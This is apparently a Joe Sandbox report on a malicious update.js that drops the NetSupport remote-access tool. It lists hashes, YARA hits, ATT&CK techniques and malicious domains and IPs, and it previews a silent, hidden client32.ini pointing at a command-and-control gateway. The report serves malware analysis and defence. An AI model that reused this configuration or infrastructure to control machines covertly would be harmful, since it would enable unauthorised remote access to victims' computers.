Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Yara match | File source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\RYMB15\pcicapi.dll, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\RYMB15\PCICHEK.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\RYMB15\TCCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLL, type: DROPPED
ATT&CK matrix (tactic: techniques listed in the report; the figure in parentheses is the number shown beside that technique):
• Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
• Resource Development: Scripting (12); Domains; DNS Server; Virtual Private Server; Server; Botnet
• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
• Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (1); Exploitation for Client Execution (1); PowerShell (3); Launchd; Scheduled Task
• Persistence: Scripting (12); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts
• Privilege Escalation: Process Injection (111); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts
• Defense Evasion: Masquerading (11); Virtualization/Sandbox Evasion (41); Process Injection (111); Obfuscated Files or Information (1); DLL Side-Loading (1); Steganography
• Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
• Discovery: Security Software Discovery (12); Process Discovery (1); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (32)
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
• Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
• Command and Control: Encrypted Channel (2); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
• Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

                      No Antivirus matches
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLL | 13% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\RYMB15\PCICHEK.DLL | 5% | ReversingLabs |
C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLL | 17% | ReversingLabs |
C:\Users\user\AppData\Roaming\RYMB15\TCCTL32.DLL | 6% | ReversingLabs |
C:\Users\user\AppData\Roaming\RYMB15\client32.exe | 26% | ReversingLabs | Win32.Trojan.NetSupport
C:\Users\user\AppData\Roaming\RYMB15\msvcr100.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\RYMB15\pcicapi.dll | 3% | ReversingLabs |
C:\Users\user\AppData\Roaming\RYMB15\remcmdstub.exe | 24% | ReversingLabs | Win32.Trojan.Generic
                      No Antivirus matches
                      No Antivirus matches
Source | Detection | Scanner | Label | Link
http://didsit.com/data.php?7211 | 100% | Avira URL Cloud | malware
http://5.181.159.28/fakeurl.htm | 0% | Avira URL Cloud | safe
http://geo.netsupportsoftware.com/location/loca.asp | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geo.netsupportsoftware.com | 104.26.1.231 | true | false | | unknown
didsit.com | 37.1.210.252 | true | true | | unknown
alphawatchrmf.com | 149.255.36.73 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://didsit.com/data.php?7211 | true | Avira URL Cloud: malware | unknown
http://5.181.159.28/fakeurl.htm | false | Avira URL Cloud: safe | unknown
http://geo.netsupportsoftware.com/location/loca.asp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.255.36.73 | alphawatchrmf.com | Netherlands | 29802 | HVC-ASUS | true
104.26.1.231 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
184.28.90.27 | unknown | United States | 16625 | AKAMAI-ASUS | false
37.1.210.252 | didsit.com | Ukraine | 29802 | HVC-ASUS | true
5.181.159.28 | unknown | Moldova Republic of | 39798 | MIVOCLOUDMD | false
                            IP
                            127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1490239
Start date and time: 2024-08-08 22:33:43 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
Analysis Mode: stream
Analysis stop reason: Timeout
Sample name: update.js
Detection: MAL
Classification: mal100.troj.expl.evad.winJS@8/26@3/66
Cookbook Comments:
• Found application associated with file extension: .js
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.165.164.15
• Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: update.js
Process: C:\Users\user\AppData\Roaming\RYMB15\client32.exe
File Type: ASCII text, with no line terminators
Category: modified
Size (bytes): 16
Entropy (8bit): 3.077819531114783
Encrypted: false
SSDEEP:
MD5: C40449C13038365A3E45AB4D7F3C2F3E
SHA1: CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
SHA-256: 1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
SHA-512: 3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
Malicious: false
Reputation: unknown
Preview: 40.7357,-74.1724
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 19008
Entropy (8bit): 5.5024520238798695
Encrypted: false
SSDEEP:
MD5: BB71E81B4666305496B90BAC25073A8D
SHA1: 991E58C2F68B64D08D7E3F481E1EF81F70562CB4
SHA-256: 75048145404E65C90FEE72F89B8A8AE4774EA501FAF3A89C8BCED98094F3E140
SHA-512: 076EACF715F5515857D17AC1D002EA7A8225C5D2880BB86FC4E64AA16928EAD4FC5A410A60EBFA458F5B6E7FE1FE5DF3BBCBA36B48A4A223105436022689F213
Malicious: false
Reputation: unknown
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:unknown
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):2594677
                            Entropy (8bit):7.997703048460563
                            Encrypted:true
                            SSDEEP:
                            MD5:84F0AC530280471801D3C9BABD74EEFF
                            SHA1:120124F92602E03EB7ADE7AC6DCC937C3591281A
                            SHA-256:A919586EF0C34B71244213D507B7C7001CE01071F9B2D4FE537C0F4AFCB393F0
                            SHA-512:D49CAAF8EA5C9E0A625E59DDCBC37488C4975912D0D539C7E777442E8B21804E6A4D4A55F0A2733991277E82BC43ECA6E591F4ACA69CC19DDBA75CB386529C97
                            Malicious:false
                            Reputation:unknown
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):328056
                            Entropy (8bit):6.7547459359511395
                            Encrypted:false
                            SSDEEP:
                            MD5:C94005D2DCD2A54E40510344E0BB9435
                            SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                            SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                            SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLL, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 13%
                            Reputation:unknown
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):24504
                            Entropy (8bit):7.872865717955356
                            Encrypted:false
                            SSDEEP:
                            MD5:B8F553FBD3DC34B58BC77A705711023D
                            SHA1:4AB1052F906FDA96F877E398426DA5646574C878
                            SHA-256:2761C60263A2919B856915BDD2A0604B7F0E56E59D893AB13CCCEF2B7C967229
                            SHA-512:15A1DF0DBB06B4BB64A2B8CD7AD22578292D5ECDEC64303350E027F9F87FA8A825CB1CC97F94862D8C235C85B0C79A4FEABFB89D9E0B77BE62AAB25785122A60
                            Malicious:false
                            Reputation:unknown
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):195
                            Entropy (8bit):4.924914741174998
                            Encrypted:false
                            SSDEEP:
                            MD5:E9609072DE9C29DC1963BE208948BA44
                            SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                            SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
                            SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                            Malicious:true
                            Reputation:unknown
                            Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Generic INItialization configuration [Features]
                            Category:dropped
                            Size (bytes):6458
                            Entropy (8bit):4.645519507940197
                            Encrypted:false
                            SSDEEP:
                            MD5:88B1DAB8F4FD1AE879685995C90BD902
                            SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                            SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                            SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                            Malicious:false
                            Reputation:unknown
                            Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):18808
                            Entropy (8bit):6.292094060787929
                            Encrypted:false
                            SSDEEP:
                            MD5:104B30FEF04433A2D2FD1D5F99F179FE
                            SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                            SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                            SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\PCICHEK.DLL, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 5%
                            Reputation:unknown
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3740024
                            Entropy (8bit):6.527276298837004
                            Encrypted:false
                            SSDEEP:
                            MD5:D3D39180E85700F72AAAE25E40C125FF
                            SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                            SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                            SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLL, Author: Joe Security
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLL, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 17%
                            Reputation:unknown
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):396664
                            Entropy (8bit):6.80911343409989
                            Encrypted:false
                            SSDEEP:
                            MD5:2C88D947A5794CF995D2F465F1CB9D10
                            SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                            SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                            SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\TCCTL32.DLL, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 6%
                            Reputation:unknown
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):103824
                            Entropy (8bit):6.674952714045651
                            Encrypted:false
                            SSDEEP:
                            MD5:C4F1B50E3111D29774F7525039FF7086
                            SHA1:57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
                            SHA-256:18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
                            SHA-512:005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 26%
                            Reputation:unknown
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):668
                            Entropy (8bit):5.421028976210353
                            Encrypted:false
                            SSDEEP:
                            MD5:A7D077A1AA3244F7251C1F0FFE6B875F
                            SHA1:B32BA9DCAB9D5108B1B887E7DCEA339B7E5467D4
                            SHA-256:0EB705D2D4FABB4350C7C3BFD097EE2AD74DB89283B7B6BD35A6C89BFAEE7EB3
                            SHA-512:C4E6A7142A7CC29E188E791AD3834037F029C717BB58942DDA592732791D9EA056E84D27BF6A73D39E7C4ED98128236545B070D835208D75C83EBAD149ECB4B8
                            Malicious:false
                            Reputation:unknown
                            Preview:0x98cbab77....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableManageServices=0..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=5.181.159.28:443..gskmode=0..GSK=GL=BDMGM;EACEKHK=ECAHB=B..GSKX=EIHJ=HBKHH;L>GCIFI;H>MCP..
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:XML 1.0 document, ASCII text, with very long lines (15941), with CRLF line terminators
                            Category:dropped
                            Size (bytes):18112
                            Entropy (8bit):5.982171430913221
                            Encrypted:false
                            SSDEEP:
                            MD5:7FD9CD05F23D42FB6DEDA65BD1977AC9
                            SHA1:DF25A2C9E1E9FA05805DA69FF41337B9F59755FB
                            SHA-256:CA6C469655D4D0D7CE5BEB447DAB43048A377A6042C4800B322257567AC135D9
                            SHA-512:6AE8ADDF0C55058803305F937593BA02202C99639A572BE0CACBFDE598019CF8DB7067E0392BD66C43CF7D8780E454EC5E08D68BCFD491B60A450FFC280C81B8
                            Malicious:false
                            Reputation:unknown
                            Preview:<?xml version="1.0" encoding="utf-8"?>..<CustomCapabilityDescriptor xmlns="http://schemas.microsoft.com/appx/2016/sccd" xmlns:s="http://schemas.microsoft.com/appx/2016/sccd">...<CustomCapabilities>....<CustomCapability Name="Microsoft.delegatedWebFeatures_8wekyb3d8bbwe"/>...</CustomCapabilities>...<AuthorizedEntities>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Canary_8wekyb3d8bbwe" CertificateSignatureHash="f6f717a43ad9abddc8cefdde1c505462535e7d1307e630f9544a2d14fe8bf26e"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Canary_8wekyb3d8bbwe" CertificateSignatureHash="279cd652c4e252bfbe5217ac722205d7729ba409148cfa9e6d9e5b1cb94eaff1"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Dev_8wekyb3d8bbwe" CertificateSignatureHash="f6f717a43ad9abddc8cefdde1c505462535e7d1307e630f9544a2d14fe8bf26e"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Dev_8wekyb3d8bbwe" CertificateSignatureHash="279cd652c4e252bfbe5217
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):24910
                            Entropy (8bit):5.246760185320695
                            Encrypted:false
                            SSDEEP:
                            MD5:8028AB84D61FC5E00FEEA816E1D1E293
                            SHA1:73F6340BE4C6B5AF09673DACDF1AAB7405B966AA
                            SHA-256:3F2EB6455F54365C27829F85DD64CA0BAFAA8577A6C8E79A54A6DD4C67DF6470
                            SHA-512:276DF846F72F2B410852F0709F3EFFD853C3B012E94A6A3DFFB364F9597D4CCFE453B6533CE7A67C9DCE5B829C0F96E9838A267269687213D996B60591C586F0
                            Malicious:false
                            Reputation:unknown
                            Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>..<WindowsPerformanceRecorder Version="1.0" Author="Microsoft Corporation" Comments="MF tracing profile" Company="Microsoft Corporation" Copyright="Microsoft Corporation" Tag="MFTrace">.. <Profiles>.. <EventCollector Id="EventCollector_Camera_MF_Trace" Name="MFTrace Event Collector">.. <BufferSize Value="1024" />.. <Buffers Value="3" PercentageOfTotalMemory="true" MaximumBufferSpace="192" />.. </EventCollector>.. <EventProvider Id="AuthUX_1" Name="3ec987dd-90e6-5877-ccb7-f27cdf6a976b" />.. <EventProvider Id="AuthUX_2" Name="41ad72c3-469e-5fcf-cacf-e3d278856c08" />.. <EventProvider Id="AuthUX_3" Name="4f7c073a-65bf-5045-7651-cc53bb272db5" />.. <EventProvider Id="AuthUX_4" Name="a6c5c84d-c025-5997-0d82-e608d1abbbee" />.. <EventProvider Id="AuthUX_5" Name="c0ac3923-5cb1-5e37-ef8f-ce84d60f1c74" />.. <EventProvider Id="AuthUX_6" Name="df350158-0f8f-555d-7e4f-f1151ed14299" />.. <EventProvider Id="Aut
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):238
                            Entropy (8bit):4.824253848576346
                            Encrypted:false
                            SSDEEP:
                            MD5:442699C95B20A60470421C6A4D29960F
                            SHA1:C7317F2D2414C991C21205BA3C68A187B997E3C1
                            SHA-256:44844CF3DDE6E80087AE0E6BF0D9326D7EF7D23326D24AC83AF0850BE26923D2
                            SHA-512:C89CF089F7FEEB80C6DED11F1FCE84287ABE8216A6E05723D1A7FAF567C501C043CD1246FF8DBEE1240D2D79C41B698EF4CC3459589E68E5BFC5BED7FC3A150B
                            Malicious:false
                            Reputation:unknown
                            Preview:{. "name": "MEI Preload", . "icons": {}, . "version": "1.0.7.1652906823", . "manifest_version": 2, . "update_url": "https://clients2.google.com/service/update2/crx", . "description": "Contains preloaded data for Media Engagement".}.
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):8254
                            Entropy (8bit):6.795641289553097
                            Encrypted:false
                            SSDEEP:
                            MD5:D5E4C2634EFF8A9B3FAF432BF406D6D1
                            SHA1:A691F5C9877079193C1F7DFB16DBC30BB0372EC9
                            SHA-256:C6070A157B4E28D16FBCCBD233E93846DDB070C85E1A1BC64469B7A5F1424FAD
                            SHA-512:B264E28AC8F111DF01C553445AADC7BCDB3F32A38A1A19D3F9D458270DFEAF80EFA7144407BD999892022AF9DDE9DBF8A0E19E7212720E1C6511EA9125AFB166
                            Malicious:false
                            Reputation:unknown
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):439717
                            Entropy (8bit):6.67922802127972
                            Encrypted:false
                            SSDEEP:
                            MD5:17CA9A0F4EAAE3EEDD5B9E666E42A334
                            SHA1:A9CE1E52E0395EABB3AD63CBF89BC9935479E506
                            SHA-256:271AEFA63F3E7DC9B42FA4DD5668A7D206A1B926FCD6FBBAF3D82B47B9F6411B
                            SHA-512:11012A3B5F5A66CA82BEDE1155748CA6AAA246D6BDFA381CC2C199AF12862759434F31FA55FCFD2619A486579BB838B2BCF2486BA9DDACD7A7DB73124B4551D2
                            Malicious:false
                            Reputation:unknown
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):435853
                            Entropy (8bit):6.685926193725767
                            Encrypted:false
                            SSDEEP:
                            MD5:1404C2A11F3810B9A4CC3CB80EF00AB7
                            SHA1:2AB7C083C0D17B6EC9D56B05230EE8216D3C9B54
                            SHA-256:A9BC565A3B36A42FE4F0BECFFCE1E4A7EF343E82220D97A19B92970343661D26
                            SHA-512:EC9BFAB9101A676FA035DB1DECC4700FC5D71DA4D7BDBA2F0872802768BCCE184F5F8C9BA27CADE733E8D1EBD8BCC6CB55746801EA8F6C5E1088E1453B11B1E3
                            Malicious:false
                            Reputation:unknown
                            Preview:........o"..e.@...g.M...h.S...i.d...j.h...k.w...l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....|.....}...................'...../.....6.....=.....D.....F.....K.....T.....`.....o.....~...........n.......................f.......................[.......................O.....|.................6....._.....k.................(.....5.......................%.......................&.............................g.......................V.......................l.................&.....r.......................$.....p.......................;.....^.....m.................>.....J.......................'.............................h.......................@.......................1.......................'.....m.......................3.....M.................1.....C.................!.....D.............................E.......................0.....|.................9.......................t.................%.............................P.............................]...................
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with CRLF, LF line terminators
                            Category:dropped
                            Size (bytes):1794
                            Entropy (8bit):3.5509498109363986
                            Encrypted:false
                            SSDEEP:
                            MD5:3F78A0569C858AD26452633157103095
                            SHA1:8119BCC1D66B17CCD286FEF396FA48594188C4D0
                            SHA-256:D53FC339533D39F413DDD29A69ADE19F2972383DB8FB8938D77D2E79C8573F36
                            SHA-512:89842E39703970108135D71CE4C039DF19C18F04C280CB2516409758F9D22E0205567B08DBE527A6FB7C295BDA2EA8EE6A368D6FCAF6FB59645D31EF2243AD3D
                            Malicious:false
                            Reputation:unknown
                            Preview://353b2d6049dd2f0998bdd73f13855b290ad0be89f62d61dbc2672253e4fb72da.{.. "install": {.. "clids": {.. "clid1": {.. "clid": "1985548",.. "vid": "225".. },.. "clid10": {.. "clid": "1985553",.. "vid": "225".. },.. "clid100004": {.. "clid": "1985555",.. "vid": "225".. },.. "clid1010": {.. "clid": "2372823",.. "vid": "".. },.. "clid15": {.. "clid": "1985554",.. "vid": "225".. },.. "clid21": {.. "clid": "2372816",.. "vid": "".. },.. "clid25": {.. "clid": "2372817",.. "vid": "".. },.. "clid28": {.. "clid": "2372813",.. "vid": "".. },.. "clid29": {.. "clid": "2372821",.. "vid": "".. },.. "clid30": {.. "clid": "2372822",.. "v
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):773968
                            Entropy (8bit):6.901559811406837
                            Encrypted:false
                            SSDEEP:
                            MD5:0E37FBFA79D349D672456923EC5FBBE3
                            SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                            SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                            SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Reputation:unknown
